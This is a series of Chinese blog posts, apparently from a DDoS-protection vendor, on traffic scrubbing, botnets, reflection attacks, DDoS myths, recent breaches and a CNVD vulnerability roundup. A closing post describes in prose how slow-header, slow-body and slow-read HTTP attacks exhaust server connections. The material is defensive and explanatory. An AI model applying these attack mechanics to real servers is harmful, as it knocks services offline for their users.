Flood洪水攻击的方式是利用了TCP协议的弱点,将被攻击的服务器连接表占满,使其无法创建新的连接而达到拒绝服务的目的。那么在SYN请求达到一定数量清洗后,就会回复一个SYN+ACK数据,等待客户端回复。确定SYN请求是正常的用户,客户端就会对SYN+ACK进行响应,同时流量清洗技术会代替用户并且保护服务器建立了TCP连接,然后将连接加入信任列表当中。这样用户端和服务端之间可以进行正常的数据通信。如果SYN请求来自攻击者,通常不会对SYN+ACK响应,所以只是单方面的连接,流量清洗技术会暂时保留一段时间这个单方面的连接,经过一定的短的时间就丢弃它。所以相比保护服务器,流量清洗技术会对连接表进行优化,也能处理很大的连接请求。因此清洗设备保护了服务器,也不会使其消耗任何的连接资源,性能不会受影响。 3、流量清洗过程中还会对客户端真实性验证,主要是对客户端的程序以及应答模式的相互验证。以此来检查客户端能否完成特定的功能和确认请求数据是否来自真实的客户端。在页面的WEB服务中,通过检查客户端是否支持JavaScript来验证请求来源是否是真实的浏览器客户端。在收到HTTP请求是,流量清洗技术会试用JavaScript等脚本语言发送简单的运算操作。一般对真实的浏览器请求会进行正确的运算结果返回,这个时候流量清洗将验证后的请求跳转到Web服务器上的正常资源位置,以此不影响正常的用户访问。如果是攻击工具发送的,是不会返回正常的运算结果,因此流量清洗技术会直接丢弃这样请求,不会让其跳转到Web服务器的连接,服务器也不会受到影响。 DDoS攻击的防御技术随着攻击的提升也在增强中。从最初的拒绝服务变为了分布式拒绝服务,而且还在变异中,所以缓解的技术也是越来越深奥。墨者安全我力所能及的分享一些关于DDOS攻防的技术,网络安全方面的知识以及见解,对此大家有各自的观点可以相互交流。

July 11, 2019 · 1 min · jiezi

带你了解DDOS防御中流量清洗的技术方法

遇见DDoS攻击的时,目前的防护技术中避免不了的会出现流量清洗过滤等词,客户都会很疑惑流量清洗,是怎么清洗的,会不会把正常的访问请求一起过滤清洗掉呢?这是站在客户角度最关心的一个问题,这种想法很正常,因为谁都不想损失客户嘛。那接下来分享下DDoS防御中流量清洗的技术方法吧。 流量清洗的意思是全部的网络流量中区分出正常的流量和恶意的流量,将恶意流量阻断和丢弃,而只将正常的流量回源给源服务器。墨者安全一般建议选择优秀的流量清洗设备。有些漏报率太高的,对大量的正常请求过程中会造成中断,有可能会影响到业务的正常运行,相当于优秀的清洗设备,可以降低漏报率以及误报率,在不影响业务正常运行的情况下可以将恶意攻击流量最大化的从网络流量中去除。但是做到这一步需要用到准确而高效的清洗技术。如: 1、攻击特征的匹配:在发动DDoS攻击过程中是需要借助一些攻击工具的,比如僵尸网络等。同时网络犯罪分子为了提高发送请求的效率,攻击工具发出的数据包通常是编写者伪造并固化到工具当中的。因此每种攻击工具所发出的数据包都有一些特征存在。那么流量清洗技术将会利用这些数据包中的特征作为指纹依据,通过静态指纹技术或者是动态指纹技术识别攻击流量。静态指纹识别的原理是预先将多种攻击工具的指纹特征保存在流量清洗设备中的数据库,因此所有的访问数据都会先进行内部数据库比对,如果是符合的会选择直接丢弃。动态指纹识别清洗设备对流过的网络数据包进行若干个数据包学习,然后将攻击特征记录下来,后续有访问数据命中这些特征的直接丢弃。 2、IP信誉检查:IP信誉机制是互联网上的IP地址赋予一定的信誉值.有一些经常用来当作僵尸主机的,会发送垃圾邮件或被用来做DDOS攻击的IP地址。会被赋予较低的信誉值.说明这些IP地址可能成为网络攻击的来源。所以当发生DDOS攻击的时候会对网络流量中的IP信誉检查,所以在清洗的时候会优先丢弃信誉低的IP,一般IP信誉检查的极端情况是IP黑名单机制。 3.协议完整性验证:为提高发送攻击请求的效率,大多数的都是只发送攻击请求,而不接收服务器响应的数据。因此.如果采取对请求来源进行交替严重,就可以检测到请求来源协议的完整性,然后在对其不完整的请求来源丢弃处理。在DNS解析的过程中,攻击方的工具不接收解析请求的响应数据,所以不会用TCP端口进行连接。所有流量清洗设备会利用这种方式区分合法用户与攻击方,拦截恶意的DNS攻击请求。这种验证方式也适用于HTTP协议的Web服务器。主要是利用HTTP协议中的302重定向来验证请求,确认来源是否接收了响应数据并完整实现了HTTP协议的功能。正常的合法用户在接收到302 重定向后会顺着跳转地址寻找对应的资源。而攻击者的攻击工具不接收响应数据,则不会进行跳转,直接会被清洗拦截,WEB服务器也不会受到任何影响。 针对精准的流量清洗还需要很多种的精确技术,比如速度检查与限制、协议代理和验证、客户端真实性验证等技术方法。因为时间原因,剩下的三种方法后续分享给大家。

July 10, 2019 · 1 min · jiezi

中小企业遭遇DDOS该如何缓解呢

最近小编收到很多小型公司的诉求,遭遇流量攻击该如何缓解呢?DDoS攻击不分企业大小以及行业的,比如一个企业网站的产品展示页,小说论坛网站,电子商城,支付网站,手游APP,中小型3D游戏等等。那么这些小流量网站遭遇攻击是只能处于被动挨打的地步吗?不是的 ,虽然不能像大公司一样投入大量资金去做防护,但通过一些小成本的防护缓解技术也是可以减少攻击对自身业务或者服务的影响,在一定程度上能够保障业务的正常运行。 DDoS缓解技术也称为DDoS防护技术,因此缓解才能体现技术本质,通常它不能彻底消除DDoS攻击对目标的影响,只能最大限度的减小流量攻击。目前随着DDOS攻防技术的衍变,我们对于DDOS缓解的认识也在深入改进中。现阶段缓解DDOS攻击的主要方法是对网络流量进行清洗,通过一些算法认证的技术手段将恶意的访问流量从全部的访问请求中剔除,然后将正常的访问流量回源到源服务器。但是随着拒绝服务攻击衍变,攻击流量的增大,形成了分布式拒绝服务攻击。进而单一的流量的清洗设备和流量清洗中心已经无法处理如此大规模的网络流量了。上周墨者安全听说在游戏行业出现了2T级的流量攻击。那面对当今这种大流量攻击时,在进行流量清洗时还需要进行流量稀释。 分布式拒绝服务攻击中的分布式主要的特性是攻击来源通常分布的非常广泛,会从国家的不同位置以及世界的不通过位置同时向目标发起攻击。从攻击来源分析,单个的攻击流量并不会很大,但是成千上万的攻击流量汇聚在一起,到达攻击目标时,全部的攻击流量就会完全占满被攻击者的网络出口带宽。因此就出现了CDN加速和分发网络的技术。CDN的工作原理是在互联网范围内通过DNS解析域名形式来设置多个节点作为代理缓存,并将用户的访问请求分发到最近的缓存节点,获取资源后再将结果缓存返回给用户,这样做用以加快访问速度。 还有一种是网络寻址和路由的方法,是一组提供特定服务的主机可以使用相同的IP地址,服务访问方的请求报文会被IP网络路由到目标中拓扑结构到最近的一台主机上。网络寻址一般有三种方法,单玻寻址,多播寻址和任博寻址等方法,单播顾名思义就是网络节点一对一的,每个目的地址对应一个单独的接收节点。多播是网络地址和网络节点是一对多的关系。每一个目的地址对应一群接收可复制消息的节点。请求发出方的数据报文会被发送到该地址对应的全部主机上。组播寻址也可以看做是多播寻址的一种。任播也是网络节点一对多的关系,每一个目的地址对应一群接收节点,但消息发送给拓扑结构上的最近节点。主要是通过不同的节点同时使用BGP协议向外声明同样的目的的IP地址的方式来实现。 今天时间有限,就先分享这两个缓解的方法,想了解更多的缓解方法请期待明天的更新文章。在网络安全防护中,想法永远比办法多,但是有再多的想法还不如去实践,所有的问题也就在实践过程中迎刃而解了。

July 9, 2019 · 1 min · jiezi

近期遭遇的黑客事件之一引发大量安全人员义务支持保障网络

近期,网络被黑客攻击事件频频发生。如,日本7-Eleven公司提供通过智能手机条形码来购物的支付服务“7pay”,出现了服务停止新用户的注册情况。据了解7-Eleven开启了独立二维码支付服务“7pay”,用户只需登录7-Eleven APP手机应用进行充值即现金来应用。在现阶段,通过扫描二维码支付的方法已经是大众化了,基本出门不在备有现金,一部手机就可以满足所有的消费需求。在这种便捷简易的情况下,出现了有用户提出投诉,投诉内容是他并没有购买商品却被扣款。可能是出现了漏洞导致的。接着日本柒和伊控股公司在4日发布消息称, 7-Eleven便利店使用的手机支付APP“7pay”遭遇了第三方非法入侵,大概900名用户在此次事件中受到损失,合计损失约5500万日元(约合人民币350万元)。该公司表示将全额补偿用户。但APP注册用户数量达到150万,损失可能会再进一步扩大,目前已暂停了所有充值和新用户注册。技术人员已经在努力的针对此次事件做相对应的解决方案了。我们生活环境周围连锁加盟的便利店也越来越多,第一次消费可能会提示注册会员或者关注等情况,这种情况下店家的网站或者出现漏洞被攻击,那么我们的信息资料肯定会出现泄露情况,所以应该谨慎填写重要的信息。 接下来墨者安全讲一件能引起公愤的黑客攻击事件,在2019.6.30,一个寻子公益网站的官方论坛公告称:遭受黑客攻击导致部分数据丢失,网站闭站维护中。据了解,宝贝回家寻子网是宝贝回家志愿者协会的公益网站,主要宗旨就是帮助寻找失踪儿童和给流浪乞讨的孩子找家,给家长及志愿者提供一个信息交流沟通的平台。此平台的创建人也是因为他的儿子一次意外走散后让全家人心急如焚,生活也是度日如年。深有体会的他们在2007年创建了“宝贝回家”网站,主要为许多走失孩子或者被拐走孩子的家庭提供帮助。此类的论坛已经是大量类似遭遇的父母寻求帮助的渠道之一。然而谁也不会想到这种公益性网站还会被攻击。这种事情的发生会给那些待着孩子消息的家庭再一次带来创伤。值得庆幸的是停站维护三天后,论坛恢复了正常访问。在2019.7.3日下午“宝贝回家”微信公众号发文表示:“宝贝回家论坛在各方安全人士提出宝贵建议的同时主动提供公益帮助的技术力量后终于恢复正常访问” 对于“宝贝回家”这种公益性论坛被黑客攻击行为,只能让更多的人士对其谴责,盗亦有道,对于丢失孩子的父母而言,家庭本来就已经破碎了,如果数据的丢失,网站的打不开,会影响他们内心唯一仅留存的那点希望。针对网络犯罪的你们,请保持最后的一点善心,不要给心力憔悴那些父母以及支离破碎的家庭雪上加霜。

July 8, 2019 · 1 min · jiezi

带你了解伪造地址和反射点造成的DDOS怎么处理

在现阶段的移动互联网环境中,除了僵尸网络能够在网络中造成不同形式的攻击外,伪造地址与反射点在网络中发起的攻击也是不容忽视的。如在DDoS攻击中,出现的这两种现象的给DDOS处理和防护带来了诸多困难。这篇主要分享伪造地址和反射点造成的DDOS怎么处理? 我们先讲下伪造地址攻击,伪造地址对攻击溯源追查起来变得更加闲难,因此攻击者承担的风险小,导致他们更加肆无忌惮。而且伪造地址可以发动更大规模的DDoS攻击。其中主要包括DNS反射式DDoS攻击,它能够使原始的攻击流量放大很多倍,其威胁的程度更大。最终使得DDOS防护变得更为困难,使用源地址过滤的方式不能抵抗攻击。因此有人提出了路由过滤的缓解方法 ,在网络入口处添加路由器,然后对数据包进行过滤。其中还有单播反向路径转发也属于一种缓解地址伪造的技术,路由器会对进入的数据包检查源地址和端口是否存在路由表中。如果存在就认为该数据包是通过最优路径到达该路由器,可以正常转发,否则丢弃也属于分布式过滤方法。反射式DDoS攻击,主要是DNS反射攻击,在互联网中有大量的DNS服务器可以作为反射点,而且通过伪造地址隐藏攻击源以及反射攻击的放大作用,因此也是最具破坏力的攻击方式之一。类似的攻击主要有ACK、DNS、SNMP、NTP等类型。针对反射点攻击的有效治理方法是提高DNS服务器的安全性,做到定期检查。检查内容:限制允许访问地址范围,防止被滥用;采用RRL,Knot DNS和NSD将其作为标准选项;用户端设备不应该在广域网接口监听DNS数据包,包括网络和广播地址等。墨者安全觉得想要有效的避免DDOS攻击,首先要解决潜在的威胁手段,比如僵尸网络,地址伪造以及反射性攻击等。以上属于个人观点,不喜勿喷,可以互相交流。

July 5, 2019 · 1 min · jiezi

如何有效的治理僵尸网络以此来避免遭遇DDOS

现阶段重视网络安全的程度从最近的护网行动中就可以看出,其中也涉及到了大批量的微信社群被封,不正规的网站被封等等,网络安全的实质就是技术人员与技术人员的较量,这属于一场网络战争。那么各自的进攻和防御均是由各种因素组成的。在网络安全行业大家知道的流量攻击,也是现下最流行,最泛滥的一种攻击。同时针对DDoS攻击的防护技术我们也是一直在提升中。大家都知道DDOS的攻击是由僵尸网络组建成的,那么如何有效的治理僵尸网络以此来避免遭遇DDOS? 治理僵尸网络的,可以切断DDoS攻击的源头。从理论层面上讲这是抵抗DDOS攻击最有效的方法。但是在实际操作过程中,在僵尸网络的治理方面,也面临着很多的困难和问题。困难的点:首先是在能够检测到网络异常的情况下,才能知道系统是否感染了僵尸程序。如果僵尸主机用来发动DDOS攻击,会在每秒单位时间内产生大量的攻击流量。对于安装在网络出口的检测设备可能会出现异常提示,在内存占用上一部分主机也可以发现异常。但是针对小流量并且加密过得,这些可能就会隐藏在正常的请求中不易被发觉,由此察觉不到被感染。 一般在检测到感染后,就会提取样本,然后对其进行逆向分析,找出需要的信息。不过这个时间是根据样本的难易程度来决定。最后根据分析结果来制定治理方案。一种是编写僵尸程序清除工具,分发至企业局域网的其他感染主机进行清除处理,同时将C&C服务器域名或地址以及数据包等特征加入规则予以拦截。不过这样做只能清除掉僵尸网络的一部分,剩余的僵尸网络还是可以运营,所以我们的网络仍然面临着被攻击的风险,如源于僵尸网络的DDoS攻击等。 另一种是接管或摧毁整个僵尸网络。这种做法非常因难,因为僵尸网络的分布比较广泛,并不限定在某一个区、城市、省份、国家等,而且相对应的控制服务器也分布广泛。因此,这种跨区域的打击行动就需要政府间的协调合作,不过这种一般是很难实现,只有实力强大,影响范围广的政府或者是大公司的才可以做到。 僵尸网络是黑客在网络犯罪过程中运用到工具之一。利用它可以衍变出很多种不同的攻击,造成的后果可以使整个基础的信息网络瘫痪,企业的核心数据以及个人的账户信息资料等泄露。所以墨者安全认为对僵尸网络治理的问题应该先重视起来。比如建房子的打地基一样,地基越扎实房子越牢固。相反,僵尸网络蔓延速度极其快,只有先摧毁它才能还网络世界的一点光明。

July 4, 2019 · 1 min · jiezi

如何保护网络免受DOS和DDOS的侵害呢

相信大家的对网站、服务器、APP等被流量攻击并不陌生吧。每天世界各个角落都上演着N多场的网络攻击,黑客攻击,其中包含了DDoS攻击,CC攻击等。我们通过新闻媒体可以关注到一些大企业受到的攻击,但实质上很多小企业,比如电子商城,支付网站,游戏等行业最容易被DOS关注到。即使没有被攻击的企业面对这些危险也是需要预防它,避免被侵害。 预防它们方法的前提是需要知道它们的含义区别。首先,DoS代表拒绝服务。攻击可阻止用户访问计算机、网络或者服务器。DOS通常会泛滥目标或者以Web服务器触发使其崩溃。与病毒不一样,DOS不需要运行任何特定的程序,主要利用计算机的固有性质。攻击者在获得DOS执行访问服务和信息的能力后,崩溃的服务器通常会被重启。但攻击流量的来源比较广泛,可能是众多源或者网页。因此导致了系统难以恢复。 然后DDoS代表着分布式拒绝服务,是一种针对目标系统的恶意网络攻击行为,主要针对网络层,传输层,会话层和应用层的攻击,这种攻击究竟是如何起作用的呢??通常利用大流量堵塞被攻击者的网络带宽,占用服务器的连接资源池以及占用服务器的应用层处理资源,消耗服务器处理性能后导致被攻击者的业务无法正常访问,也就是所谓的分布式拒绝服务。 那么为什么要进行DDoS攻击呢?与其他黑客攻击一样,有很多原因可以解释这个问题。有可能是是为了证明自己是一名黑客并建立信誉而发起的;或者是通过攻击进行敲诈来赚取大笔资金;又或者是同行的恶性竞争,攻击对方使其用户体验感变差,然后放弃该平台等。 最后是如何保护网络免受DOS和DDOS的侵害呢?墨者安全认为防护DDoS攻击的第一步是建立一套高性能处理器的基础设施,加高带宽;安装实时监控检测设备,当发现有恶意请求流量时,通过技术手段将其过滤清洗,然后将有效的流量转发至正确的源站;定期对系统扫描查杀,更新漏洞补丁;优先选择BGP线路。这样可以有效的缓解DDOS的迫害。

July 3, 2019 · 1 min · jiezi

一家软件服务商与DDOS之间的故事

DDoS攻击一个蔓延在网络各处地方的危险品,因为它的技术简单,而且成本低,使其没有计算机技术含量的人也是可以对别人造成威胁,进行攻击对方的网站等。因此就会有人疑问,攻击者的攻击器是哪里来的呢?这个就是一些热衷于黑客开发工具的人结合僵尸网络和大量肉鸡开发出的攻击程序,主要通过发送大量的恶意访问请求或者是模拟正常用户的访问请求,以此来耗尽服务器的资源,使其服务器系统瘫痪,打不开等问题出现,也接收不到正常请求访问的用户。今天小编接到了一个软件代理服务商发过来和别人的聊天截图,对方表明解决不了问题就连续攻击软件代理服务商一周,对此软件代理商也很郁闷的,然后让小编帮忙提供防护的解决方案。 起始原因是对方充值了二十来万左右的费用,下级代理跑路了,顺便钱也被卷跑了,所以他找到了一级软件代理商让他向甲方系统开发商索要补偿,对此一级代理商协助双方协商解决,结果可想而知,没有达到他预期的结果,对方就进行报复行为的攻击。 对此,墨者安全建议用户对最基础的服务器性能加以排查,对系统的漏洞尽快下载最新补丁更新,对防火墙权限进行严格设置,接入高防防护,隐藏网站的真实源站IP,利用替身防护,通过WAF指纹识别架构技术将其恶意访问请求等过滤清洗掉,然后将正常的访问回源到源站IP,运用此方法来解决攻击者对网站进行DDOS或CC攻击。避免源IP暴露被打,然后服务器被拉入黑洞,使业务暂停,造成损失过大。

July 2, 2019 · 1 min · jiezi

在配置DDOS高防服务后为什么会出现有些源站IP被封的情况

DDOS分布式拒绝服务,在网络中的各个行业肆掠横行,有一些受到影响的用户已经选择了有效的缓解方式,但还是会有一些问题存在。比如,有一些用户在接入了DDOS高防服务后,源站IP还是被打挂,导致IP被封,网站打不开,不能运行。对此他们表示很疑惑。今天就针对这一问题做下分析。 在配置DDOS高防服务后为什么会出现有些源站IP被封的情况?在配置 DDoS 高防服务后,如果还存在攻击绕过高防直接攻击源站 IP 的情况,那么可能就是源站IP暴露了,需要更换源站 IP。(注意:更换源站 IP 之前,请务必确认已消除所有可能暴露源站 IP 的因素。)为确保没有其他可能暴露源站 IP 的因素,墨者安全建议按照下列步骤进行逐一排查:1.源站服务器中是否存在木马、后门之类的安全隐患;2.源站 IP 是否存在一些其他的服务没有配置高防 IP 服务,如邮件服务器的 MX 记录、bbs记录等除 Web 以外的记录;(注意:请仔细检查您 DNS 解析的全部内容,确保没有记录解析到源站IP)3.是否存在网站源码信息泄露,如 phpinfo() 指令中可能包含的IP地址等泄露;4.是否存在某些恶意扫描情况。您可通过在源站上只允许高防回源 IP 来防护;5.确认已经没有业务解析到源站;6.通过工具测试当前的域名,查看是否还有解析到源站的情况;7.再次检查您的 DNS 解析配置,查看是否还存在解析到源站 IP 的记录。 检查您的 DNS 解析配置,查看是否还存在解析到源站 IP 的记录。 一般如果源站IP暴露的情况下,建议先更换源站IP,然后再接入高防防护,一般源站暴露了,接入高防就会出现攻击绕过高防直接攻击源站的情况,然后就造成了源站被封,防护无效的结果。针对DDOS的泛滥,DDOS缓解技术也在提升中。近期,金融行业受到攻击频率越发的高,应该提前做好预防,以免受到波及,影响业务,造成损失。

July 1, 2019 · 1 min · jiezi

据消息透漏最终幻想14的NA服务器遇上DDOS

大家都知道游戏行业一直是DDoS攻击的重头目标。昨天下午据消息透漏最终幻想14的NA服务器遭遇DDoS攻击。Square Enix的官方表示从2019年6月28日下午12:24(太平洋标准时间) 有玩家可能会遇到的以下问题:1、与NA数据中心断开连接,错误代码是一些比较常见的,6001,2002,5006和90002代码;2、难以登录到NA数据中心;3、难以访问,发送,以及从NA数据中心接收数据。此次事件受影响的服务主要是:FINAL FANTASY XIV ,主要影响北美服务器。最终幻想官方表示现在还不清楚是谁造成了DDOS攻击,也不清楚攻击的方式。团队正在研究解决问题并采取相对应的对策。 DDoS分布式拒绝服务,黑客试图通过使用大量恶意请求来拥塞用户的网络带宽来达到拒绝服务的目的;有的是通过占用服务器的连接资源池来达到拒绝服务的目的;有的通过占用服务器的SSL会话资源来达到拒绝服务的目的;还有的是用过占用服务器的应用处理资源,极大的消耗服务器处理性能从而达到拒绝服务的目的。多年来,DDOS攻击一直是整个行业最头疼的问题。全国每天会被DDOS攻击的游戏公司数量也是极其可观的。对于游戏行业来说,DDoS攻击情况比较复杂,攻击流量大、类型多样、变化快,攻击人员更专业,攻击周期更长,墨者安全建议选用良好的机房设施,BGP优化线路。使其防护更稳定,时效性更快,这样可以将损失降到最低。

June 29, 2019 · 1 min · jiezi

大家可能对DDoS存在的几个误区

相信大家常听到DDoS攻击,但是对它的认知大部分人的应该是来源于新闻媒体报道。当然通过这种的普及方式,我们认识到DDoS的危害性,但同时可能对它也会陷入误区。如,新闻媒体关注的是针对一些国际的知名企业和各国政府间的攻击事件,这样就会让很多人认为中小企业网站是不会被DDoS攻击的。而且DDOS针对不同行业的危害性是不一样的。下面我就分享下大家可能对DDOS存在的几个误区? 1、DDoS攻击都来自PC组成的僵尸网络,虽然常识是DDOS攻击由僵尸网络发起的,但是由于技术的进步,僵尸网络由高性能的服务器组成,在处理性能和带宽方面快速提升了。而且随着物联网的崛起,僵尸网络再次由移动设备组成。这样更有利于进行DDOS攻击。2、DDoS攻击都是消耗网络带宽资源的攻击,经常我们在新闻报道中见到表示DDOS攻击时,都会用攻击流量达到了多少G的语句来描述攻击的严重程度,这种有攻击流量的带宽做为攻击严重程度的描述,使大家误认为DDOS攻击时消耗网络带宽资源的攻击。但事实上,DDOS除了消耗带宽资源,也会消耗系统资源和应用资源的攻击方式。而且对于相同类型的攻击,流量越大危害也就越大。比如SYN洪水攻击和UDP洪水攻击在相同的攻击流量下,前者比后者的危害大。针对不同的攻击方法造成的危害和影响也不同。比如SYN洪水攻击,很多人认为是消耗网络带宽资源的攻击,实际上是耗尽系统连接表的资源。3、DDoS攻击都是洪水攻击,其实在说到DDOS攻击的时候,很多人通常会认为DDOS攻击都是洪水攻击,比如SYN Flood、UDP Flood等。正常洪水攻击是DDOS攻击方式中占比例较大的一部分,但除了洪水攻击还有一些慢速攻击, 它们会缓慢地一点点的发送请求并长期占用目标资源。4、小网站或者个人是不会遭遇攻击,如果有这样的想法,那您肯定是想错了,墨者安全我经常遇见一些用户,说他的网站刚建起来就被攻击了,怎么解决等等,一些非盈利性质的网站自然是没有影响,但是对于一些营利性质的网站就需要去解决攻击问题,还有一些个人博客等等,这种刚开始的都是小流量的站,依然碰到了攻击事件,那这种该怎么解释他为什么会受到攻击呢?所以网站的是否营利不会影响攻击行为的本质,因此做为企业的领导人是不应该忽视这个问题的。5、只有黑客才能发起DDoS,技术的发展必然会促进分工.当前大部分黑客都专注于特定领域。有些擅长发现漏洞,有些擅于开发工具.有些负责人侵过程.有些专门处理账户信息。在DDoS攻击中,他们有的利用僵尸网络.有的控制高性能服务器,形成攻击能力后对外提供租用服务。而最终的租用者很可能只是不具备任何专业知识的普通人。他们只要输入攻击目标的地址就可以完成整个攻击过程。发起DDoS攻击的可能是竞争对手,或者是一些对服务行文不满意的恶意报复行为的人。6、防火墙和入侵检测/防御系统能够缓解DDoS攻击,防火墙是最常用的安全产品,但传统的防火墙是通过高强度的检测来进行防护的,主要部署在网络入口位置,虽然可以保护网络内部的所有资源,但是也成为了DDOS攻击的目标,入侵检测/防御系统属于应用最广泛的攻击检测/防护工具.但在面临DDoS攻击是,入侵检测/防御系统通常也不能完全满足要求。它们一般是对于特征规则的情况下进行应用层攻击的检测,但目前DDqS攻击大部分模拟正常的用户数据请求进行攻击。因此防火墙和入侵检测/防御系统在有效缓解DDOS攻击的问题上存在着性能问题。7、系统优化和增加带宽能够有效的缓解DDOS攻击,系统优化主要是对被攻击系统的核心参数进行调整,比如增加TCP连接表的数量或者是建立连接超时时间等,对于小规模的DDOS攻击可以起到缓解作用,但是遇见大流量攻击,就完全没有任何作用。增加带宽也是一样的,而且最终解决不了根本的问题,只能面临小流量的缓解,大的完全是不起作用。而且不断的增加也会无限制增加的投入。8、DDoS的云端清洗服务和本地缓解设备可以相互替代,DDOS属于多种攻击的统称,不同的攻击有不同的解决方法。通常情况下云端清洗主要是通过特定的技术手段,对访问请求进行过滤分析,清洗,然后回源的方式来缓解DDOS攻击,而本地基础设施设备可以处理较小的流量攻击,需要组合高防IP,云清洗等多种方式进行有效缓解。 所以建议用户如果被攻击需要根据自身的业务选择合适的防护方法。如果是高危的行业,如游戏、支付、金融、商城网站、APP等行业,可以提前做好最基础的防护措施,避免遇见攻击后被丢入黑洞,导致业务停止,给企业造成比较大的损失。

June 28, 2019 · 1 min · jiezi

最近出现的几大疑似漏洞大家需要了解下

随着大数据时代的发展,互联网的技术更是突飞猛进。同时也给了网络犯罪分子带来了有利条件,他们会通过各种方式去给企业造成不同程度的威胁。而我们最常见的就是他们通过程序系统漏洞或者源码漏洞等方式。今天小编关注到CNVD即(国家信息安全漏洞共享平台)统计发布了近期出现的几大疑似漏洞,做为网络运维的我们需要了解下。 1、Sequelize SQL注入漏洞 ,是一款用于Node.js的数据库ORM(对象关系映射)工具。漏洞描述:Sequelize 5.8.11之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 2、Mozilla Thunderbird类型混淆漏洞,是美国Mozilla基金会的一套从Mozilla Application Suite独立出来的电子邮件客户端软件。该软件支持IMAP、POP邮件协议以及HTML邮件格式。漏洞描述:Mozilla Thunderbird 60.7.1 之前版本中的icalproperty.c文件存在类型混淆漏洞。攻击者可通过诱使用户打开特制的邮件利用该漏洞造成应用程序崩溃。3、歪酷CMS存在文件上传漏洞,是一套内容管理系统。漏洞描述:歪酷CMS存在文件上传漏洞,攻击者利用该漏洞获取网站服务器控制权。4、TPshop开源商城系统Ap*.php文件存在SQL注入漏洞,TPshop一套多商家模式的商城系统。漏洞描述:TPshop开源商城系统Ap*.php文件存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。5、致远A8+协同管理软件存在远程Getshell漏洞,是一款协同管理软件及云服务的供应商,专注专注在协同管理软件领域。漏洞扫描:致远A8+协同管理软件存在远程Getshell漏洞。攻击者通过上传精心构造的后门文件即可Getshell,获得目标服务器的权限。6、IBM Security Access Manager Appliance开放重定向漏洞,是美国IBM公司的一款基于网络设备的安全解决方案。该产品主要用于访问控制和基于Web的威胁防护,提供系统性能监控、日志分析和诊断等功能。漏洞描述:IBM ISAM Appliance中存在安全漏洞。攻击者可通过诱使用户访问特制的网站利用该漏洞伪造URL,将用户重定向到恶意的网站,获取敏感信息或实施其他攻击。7、Mozilla Firefox和Firefox ESR安全绕过漏洞(CNVD-2019-19289),两款都是美国Mozilla基金会的产品。Mozilla Firefox是一款开源Web浏览器。Mozilla Firefox ESR是Firefox(Web浏览器)的一个延长支持版本。漏洞扫描:Mozilla Firefox 67.0.4之前版本和Firefox ESR 60.7.2之前版本中存在安全漏洞。攻击者可通过诱使用户访问特制的网站利用该漏洞绕过安全限制。8、RDK WebUI组件访问控制错误漏洞和RDK CcspWifiAgent模块命令执行漏洞,是RDK Management社区的两套模块化、可移植、可定制的开源物联网软件解决方案。CcspWifiAgent是其中的一个支持WiFi功能的模块。漏洞扫描:RDK RDKB-20181217-1版本中的WebUI组件的actionHandlerUtility.php文件存在访问控制错误漏洞。攻击者可通过向PHP后端发送HTTP POST请求利用该漏洞控制DDNS、QoS、RIP和其他的特权配置。漏洞描述:RDK RDKB-20181217-1版本中的CcspWifiAgent模块的cosa_wifi_apis.c文件存在安全漏洞。攻击者可通过将Wi-Fi网络密码更改成包含有特制转义字符的密码利用该漏洞执行任意的shell命令。 针对以上疑似漏洞的程序,墨者安全建议去相对应的官方网站下载最新的补丁程序进行更新;对待开源商城模式的漏洞、电子邮件的混淆漏洞等重点排查,账号密码更改;做一些临时缓解的措施,配置URL访问控制策略;采用专业的查杀工具进行查杀处理,重点扫描;找专业的安全技术人员帮忙协助做深入的排查等。(注:漏洞信息转载于CNVD即国家信息安全漏洞共享平台)

June 27, 2019 · 1 min · jiezi

由waf总结的攻击方式

DDos在信息安全三要素:"完整性"、"保密性"、"可用性",Dos针对的就是可用性 例如:一群恶霸试图让对面那家有着竞争关系的商铺无法正常营业,他们会采取什么手段呢?(只为举例,切勿模仿)恶霸们扮作普通客户一直拥挤在对手的商铺,赖着不走,真正的购物者却无法进入;或者总是和营业员有一搭没一搭的东扯西扯,让工作人员不能正常服务客户;也可以为商铺的经营者提供虚假信息,商铺的上上下下忙成一团之后却发现都是一场空,最终跑了真正的大客户,损失惨重。此外恶霸们完成这些坏事有时凭单干难以完成,需要叫上很多人一起。嗯,网络安全领域中DoS和DDoS攻击就遵循着这些思路 cc是DDos攻击方式的一种。DDos攻击时针对IP的攻击、cc攻击是针对服务器资源的攻击 cc攻击的变异品种-慢速攻击1.原理:对任何一个开放了HTTP访问的服务器HTTP服务器,先建立了一个连接,指定一个比较大的content-length,然后以非常低的速度发包,比如1-10s发一个字节,然后维持住这个连接不断开。如果客户端持续建立这样的连接,那么服务器上可用的连接将一点一点被占满,从而导致拒绝服务2.分类: slow-headerWeb应用在处理HTTP请求之前都要先接收完所有的HTTP头部,因为HTTP头部中包含了一些Web应用可能用到的重要的信息。攻击者利用这点,发起一个HTTP请求,一直不停的发送HTTP头部,消耗服务器的连接和内存资源。抓包数据可见,攻击客户端与服务器建立TCP连接后,每30秒才向服务器发送一个HTTP头部,而Web服务器在没接收到2个连续的rn时,会认为客户端没有发送完头部,而持续的等等客户端发送数据 slow-body攻击者发送一个HTTP POST请求,该请求的Content-Length头部值很大,使得Web服务器或代理认为客户端要发送很大的数据。服务器会保持连接准备接收数据,但攻击客户端每次只发送很少量的数据,使该连接一直保持存活,消耗服务器的连接和内存资源。抓包数据可见,攻击客户端与服务器建立TCP连接后,发送了完整的HTTP头部,POST方法带有较大的Content-Length,然后每10s发送一次随机的参数。服务器因为没有接收到相应Content-Length的body,而持续的等待客户端发送数据 slow-read客户端与服务器建立连接并发送了一个HTTP请求,客户端发送完整的请求给服务器端,然后一直保持这个连接,以很低的速度读取Response,比如很长一段时间客户端不读取任何数据,通过发送Zero Window到服务器,让服务器误以为客户端很忙,直到连接快超时前才读取一个字节,以消耗服务器的连接和内存资源。抓包数据可见,客户端把数据发给服务器后,服务器发送响应时,收到了客户端的ZeroWindow提示(表示自己没有缓冲区用于接收数据),服务器不得不持续的向客户端发出ZeroWindowProbe包,询问客户端是否可以接收数据 防御方式设置限速阈值

June 27, 2019 · 1 min · jiezi

了解僵尸网络的控制类型可以做最好的防护措施

